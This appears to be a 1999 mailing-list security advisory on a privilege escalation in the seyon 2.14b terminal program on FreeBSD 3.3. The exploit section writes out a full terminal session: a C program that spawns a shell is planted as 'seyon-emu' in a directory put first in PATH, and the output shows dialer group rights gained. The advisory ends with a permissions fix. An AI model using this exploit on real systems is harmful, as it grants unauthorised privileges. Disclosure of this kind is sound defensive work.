Greetings, In preparing for this advisory release, I checked for "seyon" vulnerabilities in the bugtraq archives. I found that the exploit I had developed had already been discussed in May 1997. However, this does not change the fact that the current version of FreeBSD still ships a vulnerable version with vulnerable privs. I believe this is still worth noting. Here is my advisory as it was to be published before the previous vulnerability came to light. OVERVIEW A vulnerability exists in seyon v2.14b which will allow any user to upgrade his or her privs to those with which seyon runs. BACKGROUND This advisory is based entierly off the work I've done on FreeBSD 3.3-RELEASE and seyon 2.14b which is included on the FreeBSD installation CD as an "additional package". When installed via sysinstall, seyon's permissions are sgid "dialer". Different versions of seyon and different packages of 2.14b may have different default permissions. DETAILS Upon startup, seyon executes the programs "seyon-emu" and "xterm". The paths to these programs are not absolute and are gotten from the users's $PATH. By adding a directory we have write access to in our $PATH and putting our own version of seyon-emu or xterm, we can make seyon run this program with egid dialer. EXPLOIT bash-2.03$ uname -a; id; ls -la `which seyon` FreeBSD 3.3-RELEASE FreeBSD 3.3-RELEASE #0: Thu Sep 16 23:40:35 GMT 1999 jkh@highwing.cdrom.com:/usr/src/sys/compile/GENERIC i386 uid=1000(xnec) gid=1000(xnec) groups=1000(xnec) -rwxr-sr-x 1 bin dialer 88480 Sep 11 00:55 /usr/X11R6/bin/seyon bash-2.03$ cat > seyonx.c void main () { setregid(getegid(), getegid()); system("/usr/local/bin/bash"); } bash-2.03$ gcc -o seyon-emu seyonx.c bash-2.03$ PATH=.:$PATH bash-2.03$ seyon bash-2.03$ id uid=1000(xnec) gid=68(dialer) groups=68(dialer), 1000(xnec) bash-2.03$ FIX Simply chmod 750 `which seyon` and add selected users to the "dialer" group. Brock Tellier UNIX Administrator Chicago, IL, USA btellier@usa.net ____________________________________________________________________ Get free email and a permanent address at http://www.netaddress.com/?N=1